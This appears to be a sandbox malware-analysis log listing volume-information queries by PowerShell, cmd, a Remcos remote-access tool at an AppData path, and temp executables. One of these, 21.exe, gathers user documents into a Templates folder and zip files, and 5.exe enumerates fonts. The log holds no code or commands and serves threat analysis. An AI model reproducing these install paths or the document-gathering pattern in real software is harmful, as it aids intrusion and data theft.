                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\LSBIHQFDVT.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\LSBIHQFDVT.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\UOOJJOZIRH.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\UOOJJOZIRH.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\ZTGJILHXQB.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\ZTGJILHXQB.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
